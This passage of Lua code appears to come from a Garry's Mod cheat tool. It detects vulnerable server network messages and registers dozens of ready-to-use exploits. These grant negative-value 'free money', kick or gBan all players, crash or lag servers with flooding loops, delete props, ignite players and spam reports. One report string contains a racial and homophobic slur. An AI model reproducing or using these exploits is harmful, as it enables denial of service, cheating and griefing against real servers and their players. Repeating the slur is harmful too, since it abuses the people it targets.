  2504. addExploit( "116","Free Money #11", "get money", function()
  2505. surface.PlaySound("garrysmod/ui_click.wav")
  2506. ECNotify("Starting")
  2507. net.Start("NET_SS_DoBuyTakeoff",true)
  2508. net.WriteEntity(LocalPlayer())
  2509. net.WriteEntity(table.Random(player.GetAll()))
  2510. net.WriteTable({})
  2511. net.WriteInt(-1000000000000000000000000000000000000000000000000000000000000000000, 16)
  2512. net.SendToServer()
  2513. end )
  2514. end
  2516. status = ValidNetString("NET_EcSetTax")
  2517. if (status) then
  2518. ECPrint("Found Exploit: Free Money #12 [NET_EcSetTax]")
  2519. addExploit( "117","Free Money #12", "get money", function()
  2520. surface.PlaySound("garrysmod/ui_click.wav")
  2521. ECNotify("Starting")
  2522. net.Start("NET_EcSetTax")
  2523. net.WriteInt(-9999999999, 16)
  2524. net.SendToServer()
  2525. end )
  2526. end
  2528. status = ValidNetString("RP_Accept_Fine")
  2529. if (status) then
  2530. ECPrint("Found Exploit: Free Money #13 [RP_Accept_Fine]")
  2531. addExploit( "118","Free Money #13", "get money", function()
  2532. surface.PlaySound("garrysmod/ui_click.wav")
  2533. ECNotify("Starting")
  2534. for k,v in pairs(player.GetAll())do
  2535. net.Start("RP_Accept_Fine")
  2536. net.WriteString(v:Nick())
  2537. net.WriteDouble(-999999999999)
  2538. net.SendToServer()
  2539. end
  2540. end )
  2541. end
  2543. status = ValidNetString("drugseffect_remove")
  2544. if (status) then
  2545. ECPrint("Found Exploit: Remove Weapons [drugseffect_remove]")
  2546. addExploit( "119","Remove Weapons", "remove all weapons", function()
  2547. surface.PlaySound("garrysmod/ui_click.wav")
  2548. ECNotify("Starting")
  2549. net.Start("drugseffect_remove")
  2550. net.SendToServer()
  2551. end )
  2552. end
  2554. status = ValidNetString("drugs_money")
  2555. if (status) then
  2556. ECPrint("Found Exploit: Remove Money [drugs_money]")
  2557. addExploit( "120","Remove Money", "remove all money", function()
  2558. surface.PlaySound("garrysmod/ui_click.wav")
  2559. ECNotify("Starting")
  2560. net.Start("drugs_money")
  2561. net.SendToServer()
  2562. end )
  2563. end
  2565. status = ValidNetString("CRAFTINGMOD_SHOP")
  2566. if (status) then
  2567. ECPrint("Found Exploit: Free Money #14 [CRAFTINGMOD_SHOP]")
  2568. addExploit( "121","Free Money #14", "an exploit in 'crafting mod'", function()
  2569. surface.PlaySound("garrysmod/ui_click.wav")
  2570. ECNotify("Starting")
  2571. net.Start("CRAFTINGMOD_SHOP")
  2572. net.WriteTable({
  2573. BUY = -9999999;
  2574. type = 1
  2575. })
  2576. net.WriteInt(1,16)
  2577. net.SendToServer()
  2578. end )
  2579. end
  2581. status = ValidNetString("drugs_ignite")
  2582. if (status) then
  2583. ECPrint("Found Exploit: Fire Players [drugs_ignite]")
  2584. addExploit( "122","Fire Players", "", function()
  2585. surface.PlaySound("garrysmod/ui_click.wav")
  2586. ECNotify("Starting")
  2587. net.Start("drugs_ignite")
  2588. net.WriteString("player")
  2589. net.SendToServer()
  2590. end )
  2591. end
  2593. status = ValidNetString("drugs_ignite")
  2594. if (status) then
  2595. ECPrint("Found Exploit: Fire Props [drugs_ignite]")
  2596. addExploit( "123","Fire Props", "", function()
  2597. surface.PlaySound("garrysmod/ui_click.wav")
  2598. ECNotify("Starting")
  2599. net.Start("drugs_ignite")
  2600. net.WriteString("prop_physics")
  2601. net.SendToServer()
  2602. end )
  2603. end
  2605. status = ValidNetString("drugseffect_hpremove")
  2606. if (status) then
  2607. ECPrint("Found Exploit: Change HP [drugseffect_hpremove]")
  2608. addExploit( "124","Change HP", "", function()
  2609. surface.PlaySound("garrysmod/ui_click.wav")
  2610. ECNotify("Starting")
  2611. net.Start("drugseffect_hpremove")
  2612. net.WriteString(99999)
  2613. net.SendToServer()
  2614. end )
  2615. end
  2617. status = ValidNetString("drugs_text")
  2618. if (status) then
  2619. ECPrint("Found Exploit: Delete All Props #2 [drugs_text]")
  2620. addExploit( "125","Delete All Props #2", "", function()
  2621. surface.PlaySound("garrysmod/ui_click.wav")
  2622. ECNotify("Starting")
  2623. net.Start("drugs_text")
  2624. net.WriteString("prop_physics")
  2625. net.SendToServer()
  2626. end )
  2627. end
  2629. status = ValidNetString("drugs_give")
  2630. if (status) then
  2631. ECPrint("Found Exploit: Give Everyone RPG [drugs_give]")
  2632. addExploit( "126","Give Everyone RPG", "", function()
  2633. surface.PlaySound("garrysmod/ui_click.wav")
  2634. ECNotify("Starting")
  2635. net.Start("drugs_give")
  2636. net.WriteString("weapon_rpg")
  2637. net.SendToServer()
  2638. end )
  2639. end
  2641. status = ValidNetString("drugs_text")
  2642. if (status) then
  2643. ECPrint("Found Exploit: Remove Water [drugs_text]")
  2644. addExploit( "127","Remove Water", "", function()
  2645. surface.PlaySound("garrysmod/ui_click.wav")
  2646. ECNotify("Starting")
  2647. net.Start("drugs_text")
  2648. net.WriteString("func_water_analog")
  2649. net.SendToServer()
  2650. end )
  2651. end
  2653. status = ValidNetString("drugs_effect")
  2654. if (status) then
  2655. local eye = LocalPlayer():GetEyeTrace().Entity
  2656. local send = "del|"..eye:EntIndex()
  2657. ECPrint("Found Exploit: Remove looking at [drugs_effect]")
  2658. addExploit( "128","Remove looking at", "", function()
  2659. surface.PlaySound("garrysmod/ui_click.wav")
  2660. ECNotify("Starting")
  2661. net.Start("drugs_effect")
  2662. net.WriteString(send)
  2663. net.SendToServer()
  2664. end )
  2665. end
  2667. status = ValidNetString("RecKickAFKer")
  2668. if (status) then
  2669. ECPrint("Found Exploit: Kick Everyone #2 [RecKickAFKer]")
  2670. addExploit( "129","Kick Everyone #2", "kick all players", function()
  2671. surface.PlaySound("garrysmod/ui_click.wav")
  2672. ECNotify("Starting")
  2673. for k, v in pairs( player.GetAll() ) do
  2674. net.Start("RecKickAFKer")
  2675. net.WriteEntity(v)
  2676. net.SendToServer()
  2677. end
  2678. end )
  2679. end
  2681. status = ValidNetString("GMBG:PickupItem")
  2682. if (status) then
  2683. ECPrint("Found Exploit: Loot Items [GMBG:PickupItem]")
  2684. addExploit( "130","Loot Items", "", function()
  2685. surface.PlaySound("garrysmod/ui_click.wav")
  2686. ECNotify("Starting")
  2687. for k, v in pairs(ents.GetAll()) do
  2688. if v:GetClass() == "item_loot" then
  2689. net.Start("GMBG:PickupItem")
  2690. net.WriteEntity(v)
  2691. net.SendToServer()
  2692. net.Start("GMBG:PickupItem")
  2693. net.WriteEntity(v)
  2694. net.SendToServer()
  2695. net.Start("GMBG:PickupItem")
  2696. net.WriteEntity(v)
  2697. net.SendToServer()
  2698. net.Start("GMBG:PickupItem")
  2699. net.WriteEntity(v)
  2700. net.SendToServer()
  2701. net.Start("GMBG:PickupItem")
  2702. net.WriteEntity(v)
  2703. net.SendToServer()
  2704. net.Start("GMBG:PickupItem")
  2705. net.WriteEntity(v)
  2706. net.SendToServer()
  2707. end
  2708. end
  2709. end )
  2710. end
  2712. status = ValidNetString("plyWarning")
  2713. if (status) then
  2714. ECPrint("Found Exploit: Kick Everyone #3 [plyWarning]")
  2715. addExploit( "131","Kick Everyone #3", "kick all players", function()
  2716. surface.PlaySound("garrysmod/ui_click.wav")
  2717. ECNotify("Starting")
  2718. for k, v in pairs( player.GetAll() ) do
  2719. net.Start('plyWarning')
  2720. net.WriteEntity(v)
  2721. net.WriteString('You have to select a player before doing a action.')
  2722. net.SendToServer()
  2723. end
  2724. end )
  2725. end
  2727. status = ValidNetString("NLR.ActionPlayer")
  2728. if (status) then
  2729. ECPrint("Found Exploit: Freeze Everyone [NLR.ActionPlayer]")
  2730. addExploit( "132","Freeze Everyone", "", function()
  2731. surface.PlaySound("garrysmod/ui_click.wav")
  2732. ECNotify("Starting")
  2733. for k, v in pairs( player.GetAll() ) do
  2734. net.Start("NLR.ActionPlayer")
  2735. net.WriteEntity(v)
  2736. net.SendToServer()
  2737. end
  2738. end )
  2739. end
  2741. status = ValidNetString("kart_sell")
  2742. if (status) then
  2743. ECPrint("Found Exploit: Free Money #15 [kart_sell]")
  2744. addExploit( "133","Free Money #15", "get money", function()
  2745. surface.PlaySound("garrysmod/ui_click.wav")
  2746. ECNotify("Starting")
  2747. for i=1, 300 do
  2748. net.Start("kart_sell")
  2749. net.WriteString("sw_gokart")
  2750. net.SendToServer()
  2751. end
  2752. end )
  2753. end
  2755. status = ValidNetString("ClickerAddToPoints")
  2756. if (status) then
  2757. ECPrint("Found Exploit: Free Points [ClickerAddToPoints]")
  2758. addExploit( "134","Free Points", "", function()
  2759. surface.PlaySound("garrysmod/ui_click.wav")
  2760. ECNotify("Starting")
  2761. net.Start("ClickerAddToPoints")
  2762. net.WriteInt(99999999, 32)
  2763. net.SendToServer()
  2764. end )
  2765. end
  2767. status = ValidNetString("bodyman_model_change")
  2768. if (status) then
  2769. ECPrint("Found Exploit: Body Groups [bodyman_model_change]")
  2770. addExploit( "135","Body Groups", "constantly changes your appearance", function()
  2771. surface.PlaySound("garrysmod/ui_click.wav")
  2772. ECNotify("Starting")
  2773. local PM = 1
  2774. local SK = 1
  2775. local BG = 1
  2776. local HN = 1
  2777. local TS = 1
  2778. local GL = 1
  2779. local LG = 1
  2780. if !timer.Exists( "bodygroups" ) then
  2781. timer.Create("bodygroups", 0, 0, function()
  2782. PlayerModels = {0,1,2,3,4,5,6}
  2783. Torso = {0,1,2,3,4,5,6,7,8,9,10}
  2784. Legs = {0,1,2,3,4,5,6}
  2785. Hands = {0,1,2}
  2786. Glasses = {0,1}
  2787. Skins = {0,1,2,3,4,5,6,7,8,9,10}
  2788. PM = PM+1
  2789. TS = TS+1
  2790. LG = LG+1
  2791. HN = HN+1
  2792. GL = GL+1
  2793. SK = SK+1
  2794. if (PM>#PlayerModels) then PM=1 end
  2795. if (SK>#Skins) then SK=1 end
  2796. if (HN>#Hands) then HN=1 end
  2797. if (TS>#Torso) then TS=1 end
  2798. if (GL>#Glasses) then GL=1 end
  2799. if (LG>#Legs) then LG=1 end
  2800. net.Start("bodyman_model_change")
  2801. net.WriteInt(PlayerModels[PM], 10 )
  2802. net.SendToServer()
  2803. net.Start("bodygroups_change")
  2804. net.WriteTable( { 1, Torso[TS] } )
  2805. net.SendToServer()
  2806. net.Start("bodygroups_change")
  2807. net.WriteTable( { 2, Legs[LG] } )
  2808. net.SendToServer()
  2809. net.Start("bodygroups_change")
  2810. net.WriteTable( { 3, Hands[HN] } )
  2811. net.SendToServer()
  2812. net.Start("bodygroups_change")
  2813. net.WriteTable( { 4, Glasses[GL] } )
  2814. net.SendToServer()
  2815. end )
  2816. else
  2817. timer.Remove("bodygroups")
  2818. ECNotify("Stopping")
  2819. end
  2820. end )
  2821. end
  2823. status = ValidNetString("SendMoney")
  2824. if (status) then
  2825. ECPrint("Found Exploit: Free Money #16 [SendMoney]")
  2826. addExploit( "136","Free Money #16", "get money", function()
  2827. surface.PlaySound("garrysmod/ui_click.wav")
  2828. ECNotify("Starting")
  2829. hook.Remove( "HUDPaint", "skhdsakjl")
  2830. net.Start("SendMoney")
  2831. net.WriteEntity(LocalPlayer())
  2832. net.WriteEntity(LocalPlayer())
  2833. net.WriteEntity(LocalPlayer())
  2834. net.WriteString("-99999999")
  2835. net.SendToServer()
  2836. end )
  2837. end
  2839. status = ValidNetString("BailOut")
  2840. if (status) then
  2841. ECPrint("Found Exploit: Free Money #17 [BailOut]")
  2842. addExploit( "137","Free Money #17", "", function()
  2843. surface.PlaySound("garrysmod/ui_click.wav")
  2844. ECNotify("Starting")
  2845. for k, v in pairs(player.GetAll()) do
  2846. net.Start("BailOut")
  2847. net.WriteEntity(LocalPlayer())
  2848. net.WriteEntity(v)
  2849. net.WriteFloat(-999999999)
  2850. net.SendToServer()
  2851. end
  2852. end )
  2853. end
  2855. status = ValidNetString("hitcomplete")
  2856. if (status) then
  2857. ECPrint("Found Exploit: Free Money #18 [hitcomplete]")
  2858. addExploit( "138","Free Money #18", "get money", function()
  2859. surface.PlaySound("garrysmod/ui_click.wav")
  2860. ECNotify("Starting")
  2861. net.Start("hitcomplete")
  2862. net.WriteDouble(99999999)
  2863. net.SendToServer()
  2864. end )
  2865. end
  2866. ----------------------------------------
  2867. for k,v in pairs(player.GetAll()) do
  2868. dahater = v
  2869. end
  2870. ----------------------------------------
  2871. status = ValidNetString("hhh_request")
  2872. if (status) then
  2873. ECPrint("Found Exploit: Free Money #19 [hhh_request]")
  2874. addExploit( "139","Free Money #19", "get money", function()
  2875. surface.PlaySound("garrysmod/ui_click.wav")
  2876. ECNotify("Starting")
  2877. local plyhhh = LocalPlayer()
  2878. if dahater != plyhhh then
  2879. local hitRequest = {}
  2880. hitRequest.hitman = plyhhh
  2881. hitRequest.requester = plyhhh
  2882. = dahater
  2883. hitRequest.reward = -9999999
  2884. net.Start('hhh_request')
  2885. net.WriteTable(hitRequest)
  2886. net.SendToServer()
  2887. else
  2888. ECPrint("In this version of HHH, you can not use an exploit!")
  2889. end
  2890. end )
  2891. end
  2893. status = ValidNetString("DaHit")
  2894. if (status) then
  2895. ECPrint("Found Exploit: Free Money #20 [DaHit]")
  2896. addExploit( "140","Free Money #20", "get money", function()
  2897. surface.PlaySound("garrysmod/ui_click.wav")
  2898. ECNotify("Starting")
  2899. hook.Remove( "HUDPaint", "skhdsakjl")
  2900. net.Start("DaHit")
  2901. net.WriteFloat(-99999999)
  2902. net.WriteEntity(LocalPlayer())
  2903. net.WriteEntity(LocalPlayer())
  2904. net.WriteEntity(LocalPlayer())
  2905. net.SendToServer()
  2906. end )
  2907. end
  2909. status = ValidNetString("textstickers_entdata")
  2910. if (status) then
  2911. ECPrint("Found Exploit: Crash #2 [textstickers_entdata]")
  2912. addExploit( "141","Crash #2", "1tap", function()
  2913. surface.PlaySound("garrysmod/ui_click.wav")
  2914. ECNotify("Starting")
  2915. net.Start("textstickers_entdata")
  2916. net.WriteUInt(0xFFFFFFF, 32)
  2917. net.SendToServer()
  2918. end )
  2919. end
  2921. status = ValidNetString("gBan.BanBuffer")
  2922. if (status) then
  2923. ECPrint("Found Exploit: gBan Everyone [gBan.BanBuffer]")
  2924. addExploit( "142","gBan Everyone", "exploit in the old version of gban", function()
  2925. surface.PlaySound("garrysmod/ui_click.wav")
  2926. ECNotify("Starting")
  2927. for k,v in pairs(player.GetAll()) do
  2928. if v != LocalPlayer() then
  2929. net.Start("gBan.BanBuffer")
  2930. net.WriteBool(true)
  2931. net.WriteInt(0, 32)
  2932. net.WriteString("haha owned")
  2933. net.WriteString(v:SteamID())
  2934. net.SendToServer()
  2935. end
  2936. end
  2937. end )
  2938. end
  2940. status = ValidNetString("ARMORY_RetrieveWeapon")
  2941. if (status) then
  2942. ECPrint("Found Exploit: Free Armory #1 [ARMORY_RetrieveWeapon]")
  2943. addExploit( "143","Free Armory #1", "get weapon #1", function()
  2944. surface.PlaySound("garrysmod/ui_click.wav")
  2945. ECNotify("Starting")
  2946. net.Start("ARMORY_RetrieveWeapon")
  2947. net.WriteString("weapon1")
  2948. net.SendToServer()
  2949. end )
  2950. end
  2952. status = ValidNetString("ARMORY_RetrieveWeapon")
  2953. if (status) then
  2954. ECPrint("Found Exploit: Free Armory #2 [ARMORY_RetrieveWeapon]")
  2955. addExploit( "144","Free Armory #2", "get weapon #2", function()
  2956. surface.PlaySound("garrysmod/ui_click.wav")
  2957. ECNotify("Starting")
  2958. net.Start("ARMORY_RetrieveWeapon")
  2959. net.WriteString("weapon2")
  2960. net.SendToServer()
  2961. end )
  2962. end
  2964. status = ValidNetString("ARMORY_RetrieveWeapon")
  2965. if (status) then
  2966. ECPrint("Found Exploit: Free Armory #3 [ARMORY_RetrieveWeapon]")
  2967. addExploit( "145","Free Armory #3", "get weapon #3", function()
  2968. surface.PlaySound("garrysmod/ui_click.wav")
  2969. ECNotify("Starting")
  2970. net.Start("ARMORY_RetrieveWeapon")
  2971. net.WriteString("weapon3")
  2972. net.SendToServer()
  2973. end )
  2974. end
  2976. status = ValidNetString("TransferReport")
  2977. if (status) then
  2978. ECPrint("Found Exploit: Report Spammer [TransferReport]")
  2979. addExploit( "146","Report Spammer", "report all players", function()
  2980. surface.PlaySound("garrysmod/ui_click.wav")
  2981. ECNotify("Starting")
  2982. net.Start("TransferReport")
  2983. net.WriteString(v:SteamID())
  2984. net.WriteString("CHINKGANG FAGOTS")
  2986. net.SendToServer()
  2987. end )
  2988. end
  2990. status = ValidNetString("FIRE_CreateFireTruck")
  2991. if (status) then
  2992. ECPrint("Found Exploit: Create Fire Truck [FIRE_CreateFireTruck]")
  2993. addExploit( "147","Create Fire Truck", "", function()
  2994. surface.PlaySound("garrysmod/ui_click.wav")
  2995. ECNotify("Starting")
  2996. net.Start("FIRE_CreateFireTruck")
  2997. net.SendToServer()
  2998. end )
  2999. end
  3001. status = ValidNetString("TFA_Attachment_RequestAll")
  3002. if (status) then
  3003. ECPrint("Found Exploit: Lagger #20 [TFA_Attachment_RequestAll]")
  3004. addExploit( "148","Lagger #20", "an exploit in 'TFA Weapon Pack', discovered by zerg314", function()
  3005. surface.PlaySound("garrysmod/ui_click.wav")
  3006. if !timer.Exists( "lagger20" ) then
  3007. timer.Create("lagger20", 0,0, function()
  3008. for i = 1, 800 do
  3009. net.Start("TFA_Attachment_RequestAll",true)
  3010. net.SendToServer()
  3011. end
  3012. end)
  3013. ECNotify("Starting Lagger")
  3014. else
  3015. timer.Remove("lagger20")
  3016. ECNotify("Stopping Lagger")
  3017. end
  3018. end)
  3019. end
  3021. status = ValidNetString("FIRE_RemoveFireTruck")
  3022. if (status) then
  3023. ECPrint("Found Exploit: Remove Fire Truck [FIRE_RemoveFireTruck]")
  3024. addExploit( "149","Remove Fire Truck", "", function()
  3025. surface.PlaySound("garrysmod/ui_click.wav")
  3026. ECNotify("Starting")
  3027. net.Start("FIRE_RemoveFireTruck")
  3028. net.SendToServer()
  3029. end )
  3030. end
  3032. status = ValidNetString("gPrinters.sendID")
  3033. if (status) then
  3034. ECPrint("Found Exploit: Lagger #21 [gPrinters.sendID]")
  3035. addExploit( "150","Lagger #21", "B1G LAGZ, discovered by Leith", function()
  3036. surface.PlaySound("garrysmod/ui_click.wav")
  3037. ECNotify("Starting")
  3038. if not timer.Exists("lagger21") then
  3039. timer.Create("lagger21", 0, 0, function()
  3040. for i = 1, 1000 do
  3041. net.Start("gPrinters.sendID",true)
  3042. net.WriteEntity(LocalPlayer())
  3043. net.WriteUInt(9999999999999999999999999999999999999999999999999999999999, 8)
  3044. net.SendToServer()
  3045. end
  3046. end )
  3047. end
  3048. end )
  3049. end
  3051. status = ValidNetString("requestmoneyforvk") -- RusElite Server
  3052. if (status) then
  3053. ECPrint("Found Exploit: Free 50k [requestmoneyforvk]")
  3054. addExploit( "151","Free 50k", "gives you 50k bypassing the validation check, discovered by Leith", function()
  3055. surface.PlaySound("garrysmod/ui_click.wav")
  3056. ECNotify("Starting")
  3057. net.Start("requestmoneyforvk")
  3058. net.WriteEntity(LocalPlayer())
  3059. net.SendToServer()
  3060. end )
  3061. end
  3063. status = ValidNetString("vj_testentity_runtextsd")
  3064. if (status) then
  3065. ECPrint("Found Exploit: VJSay [NEW] [vj_testentity_runtextsd]")
  3066. addExploit( "152","VJSay [NEW]", "'fix' of the old exploit", function()
  3067. surface.PlaySound("garrysmod/ui_click.wav")
  3068. ECNotify("Starting")
  3069. for k,v in pairs(player.GetAll()) do
  3070. net.Start("vj_testentity_runtextsd")
  3071. net.WriteEntity(v)
  3073. net.WriteString("vj_illuminati/Illuminati Confirmed.mp3")
  3074. net.SendToServer()
  3075. end
  3076. end )
  3077. end
  3079. status = ValidNetString("NET_BailPlayer") -- need to test
  3080. if (status) then
  3081. ECPrint("Found Exploit: Players Spam [NET_BailPlayer]")
  3082. addExploit( "153","Players Spam", "", function()
  3083. surface.PlaySound("garrysmod/ui_click.wav")
  3084. ECNotify("Starting")
  3085. for k, v in pairs (player.GetAll()) do
  3086. net.Start("NET_BailPlayer")
  3087. net.WriteEntity(v)
  3088. net.WriteEntity(v)
  3089. net.SendToServer()
  3090. end
  3091. end )
  3092. end
  3094. status = ValidNetString("Taxi_Add") -- need to test
  3095. if (status) then
  3096. ECPrint("Found Exploit: Free Money #21 [Taxi_Add]")
  3097. addExploit( "154","Free Money #21", "maybe not work", function()
  3098. surface.PlaySound("garrysmod/ui_click.wav")
  3099. ECNotify("Starting")
  3100. net.Start("Taxi_Add")
  3101. net.WriteString("MLG")
  3102. net.WriteTable({-1333.647461, -1473.931763, -139.968750})
  3103. net.WriteFloat(-99999999)
  3104. net.WriteString(Desc)
  3105. net.SendToServer()
  3106. end )
  3107. end
  3109. status = ValidNetString("BuyCar")
  3110. if (status) then
  3111. ECPrint("Found Exploit: Free Money #22 [BuyCar]")
  3112. addExploit( "155","Free Money #22", "get money", function()
  3113. surface.PlaySound("garrysmod/ui_click.wav")
  3114. ECNotify("Starting")
  3115. net.Start('BuyCar')
  3116. net.WriteFloat(-1000000)
  3117. net.WriteEntity(LocalPlayer())
  3118. net.WriteString("Gay")
  3119. net.WriteString("Cock")
  3120. net.WriteString("Twat")
  3121. net.SendToServer()
  3122. end )
  3123. end
  3125. status = ValidNetString("rpi_trade_end")
  3126. if (status) then
  3127. ECPrint("Found Exploit: Test Function [rpi_trade_end]")
  3128. addExploit( "156","Test Function", "just test", function()
  3129. surface.PlaySound("garrysmod/ui_click.wav")
  3130. ECNotify("Starting")
  3131. local it = 0
  3132. timer.Create( util.CRC( tostring( CurTime() ) ), 0.5, 0, function()
  3133. if( it > #player.GetAll() ) then
  3134. it = 1;
  3135. else
  3136. it = it + 1;
  3137. end
  3138. net.Start("rpi_trade_end")
  3139. net.WriteUInt( it, 16 )
  3140. net.SendToServer()
  3141. end )
  3142. end )
  3143. end
  3145. status = ValidNetString("ClickerForceSave")
  3146. if (status) then
  3147. ECPrint("Found Exploit: Melon Crash [ClickerForceSave]")
  3148. addExploit( "157","Melon Crash", "", function()
  3149. surface.PlaySound("garrysmod/ui_click.wav")
  3150. ECNotify("Starting")
  3151. hook.Add("Think","ps_spam",function()
  3152. for k, v in pairs (player.GetAll()) do
  3153. net.Start("ClickerForceSave")
  3154. net.WriteEntity(ply)
  3155. net.WriteInt(1, 1)
  3156. net.SendToServer()
  3157. end
  3158. end )
  3159. end )
  3160. end
  3162. status = ValidNetString("SRequest")
  3163. if (status) then
  3164. ECPrint("Found Exploit: Deagle Grab [SRequest]")
  3165. addExploit( "158","Deagle Grab", "", function()
  3166. surface.PlaySound("garrysmod/ui_click.wav")
  3167. ECNotify("Starting")
  3168. for k, v in pairs (player.GetAll()) do
  3169. net.Start("SRequest")
  3170. net.WriteEntity(v)
  3171. net.SendToServer()
  3172. end
  3173. end )
  3174. end
  3176. status = ValidNetString("HealButton")
  3177. if (status) then
  3178. ECPrint("Found Exploit: Free HP [HealButton]")
  3179. addExploit( "159","Free HP", "free hp", function()
  3180. surface.PlaySound("garrysmod/ui_click.wav")
  3181. ECNotify("Starting")
  3182. net.Start("HealButton")
  3183. net.WriteEntity(LocalPlayer())
  3184. net.WriteFloat(999999)
  3185. net.SendToServer()
  3186. end )
  3187. end
  3189. status = ValidNetString("ArmorButton")
  3190. if (status) then
  3191. ECPrint("Found Exploit: Free Armor [ArmorButton]")
  3192. addExploit( "160","Free Armor", "free armor", function()
  3193. surface.PlaySound("garrysmod/ui_click.wav")
  3194. ECNotify("Starting")
  3195. net.Start("ArmorButton")
  3196. net.WriteEntity(LocalPlayer())
  3197. net.WriteFloat(999999)
  3198. net.SendToServer()
  3199. end )
  3200. end
  3202. status = ValidNetString("SprintSpeedset")
  3203. if (status) then
  3204. ECPrint("Found Exploit: TTT SpeedHack [SprintSpeedset]")
  3205. addExploit( "161","TTT SpeedHack", "changes your speed", function()
  3206. surface.PlaySound("garrysmod/ui_click.wav")
  3207. ECNotify("Starting")
  3208. net.Start("SprintSpeedset")
  3209. net.WriteFloat(math.min(math.max(2, 0.1),2 ))
  3210. net.SendToServer()
  3211. end )
  3212. end
  3214. status = ValidNetString("GiveArmor100")
  3215. if (status) then
  3216. ECPrint("Found Exploit: Armor Exploit [GiveArmor100]")
  3217. addExploit( "162","Armor Exploit", "", function()
  3218. surface.PlaySound("garrysmod/ui_click.wav")
  3219. ECNotify("Starting")
  3220. net.Start("GiveArmor100")
  3221. net.SendToServer()
  3222. end )
  3223. end
  3225. status = ValidNetString("GiveSCP294Cup") -- NEED TO TEST !!
  3226. if (status) then
  3227. ECPrint("Found Exploit: 294 JAM [NEED TO TEST] [GiveSCP294Cup]")
  3228. SCPLAG = 0
  3229. addExploit( "163","SCP 249 JAM!", "", function()
  3230. surface.PlaySound("garrysmod/ui_click.wav")
  3231. ECNotify("Starting")
  3232. if (SCPLAG == 0) then
  3233. SCPLAG = 1
  3234. timer.Create( "LagThatShit", time, 0.05, function()
  3235. for k, v in pairs( ents.GetAll() ) do
  3236. if v:GetClass() == "scp294" then
  3237. net.Start("GiveSCP294Cup")
  3238. net.WriteString("shit")
  3239. net.WriteEntity(v)
  3240. net.SendToServer()
  3241. end
  3242. end
  3243. end)
  3244. else
  3245. SCPLAG = 0
  3246. timer.Remove("LagThatShit")
  3247. end
  3248. end)
  3249. end
  3251. status = ValidNetString("Client_To_Server_OpenEditor")
  3252. if (status) then
  3253. ECPrint("Found Exploit: SCP 249 Drink Menu Hack [Client_To_Server_OpenEditor]")
  3254. addExploit( "164","SCP 249 Drink Menu Hack", "", function()
  3255. surface.PlaySound("garrysmod/ui_click.wav")
  3256. ECNotify("Starting")
  3257. net.Start("Client_To_Server_OpenEditor")
  3258. net.SendToServer()
  3259. end )
  3260. end
  3262. status = ValidNetString("DuelMessageReturn")
  3263. if (status) then
  3264. ECPrint("Found Exploit: Duel Crazy [DuelMessageReturn]")
  3265. addExploit( "165","Duel Crazy", "forces all players to fight with all players, discovered by Solly", function()
  3266. surface.PlaySound("garrysmod/ui_click.wav")
  3267. ECNotify("Starting")
  3268. timer.Create("crazyduel", 0.1, 0, function()
  3269. s.duel[1] = table.Random( player.GetAll() )
  3270. s.duel[2] = table.Random( player.GetAll() )
  3271. net.Start("DuelMessageReturn")
  3272. net.WriteFloat(1)
  3273. net.WriteTable(s.duel)
  3274. net.SendToServer()
  3275. end )
  3276. end )
  3277. end
  3279. status = ValidNetString("userAcceptPrestige")
  3280. if (status) then
  3281. ECPrint("Found Exploit: Free Prestige [userAcceptPrestige]")
  3282. addExploit( "166","Free Prestige", "exploit for free prestige", function()
  3283. surface.PlaySound("garrysmod/ui_click.wav")
  3284. ECNotify("Starting")
  3285. net.Start("userAcceptPrestige")
  3286. net.SendToServer()
  3287. end )
  3288. end
  3290. status = ValidNetString("wordenns")
  3291. if (status) then
  3292. ECPrint("Found Exploit: Steal All Monies #11 [wordenns]")
  3293. addExploit( "167","Steal All Monies #11", "withdraw money from all printers", function()
  3294. surface.PlaySound("garrysmod/ui_click.wav")
  3295. ECNotify("Starting")
  3296. ECPrint("printers:".. tostring(#ents.FindByClass("derma_printer")))
  3297. for k,v in pairs(ents.FindByClass("derma_printer")) do
  3298. net.Start("wordenns")
  3299. net.WriteEntity(v)
  3300. net.SendToServer()
  3301. end
  3302. end)
  3303. end
  3305. status = ValidNetString("guncraft_removeWorkbench")
  3306. if (status) then
  3307. ECPrint("Found Exploit: Remove all Entity [guncraft_removeWorkbench]")
  3308. addExploit( "168","Remove all Entity", "an exploit in addon 'GunCraft'", function()
  3309. surface.PlaySound("garrysmod/ui_click.wav")
  3310. ECNotify("Starting")
  3311. if !timer.Exists( "removentity" ) then
  3312. timer.Create("removentity", 3, 0, function()
  3313. for k,v in pairs(ents.GetAll()) do
  3314. net.Start("guncraft_removeWorkbench")
  3315. net.WriteEntity(v)
  3316. net.SendToServer()
  3317. end
  3318. end )
  3319. end
  3320. end )
  3321. end
  3323. status = ValidNetString("BuyKey")
  3324. if (status) then
  3325. ECPrint("Found Exploit: Blue Unbox Exploit [NEED TO TEST]")
  3326. addExploit( "169","Blue Unbox Exploit", "", function()
  3327. surface.PlaySound("garrysmod/ui_click.wav")
  3328. ECNotify("Starting")
  3329. net.Start("BuyKey")
  3330. net.SendToServer()
  3331. net.Start("BuyCrate")
  3332. net.SendToServer()
  3333. end )
  3334. end
  3336. status = ValidNetString("casinokit_chipexchange")
  3337. if (status) then
  3338. ECPrint("Found Exploit: Free Money #23 [casinokit_chipexchange]")
  3339. addExploit( "170","Free Money #23", "only works if outdated", function()
  3340. surface.PlaySound("garrysmod/ui_click.wav")
  3341. ECNotify("Starting")
  3342. local moneylog = LocalPlayer():getDarkRPVar("money")
  3343. net.Start("casinokit_chipexchange")
  3344. net.WriteEntity(self)
  3345. net.WriteString("darkrp")
  3346. net.WriteBool(true)
  3347. net.WriteUInt(LocalPlayer():getDarkRPVar("money"),32)
  3348. net.SendToServer()
  3349. timer.Simple(3, function()
  3350. for i=1, 5000 do
  3351. net.Start("casinokit_chipexchange")
  3352. net.WriteEntity(self)
  3353. net.WriteString("darkrp")
  3354. net.WriteBool(false)
  3355. net.WriteUInt(moneylog*0.10,32)
  3356. net.SendToServer()
  3357. end
  3358. end)
  3359. end )
  3360. end
  3362. status = ValidNetString("PurchaseWeed")
  3363. if (status) then
  3364. ECPrint("Found Exploit: Buy Weed [PurchaseWeed]")
  3365. addExploit( "171","Buy Weed", "", function()
  3366. surface.PlaySound("garrysmod/ui_click.wav")
  3367. ECNotify("Starting")
  3368. net.Start("PurchaseWeed")
  3369. net.WriteInt(tonumber(10000),16)
  3370. net.WriteInt(tonumber(1),16)
  3371. net.WriteBool(LocalPlayer().Buying)
  3372. net.SendToServer()
  3373. end )
  3374. end
  3376. status = ValidNetString("PurchaseWeed")
  3377. if (status) then
  3378. ECPrint("Found Exploit: Sell Weed [PurchaseWeed]")
  3379. addExploit( "172","Sell Weed", "", function()
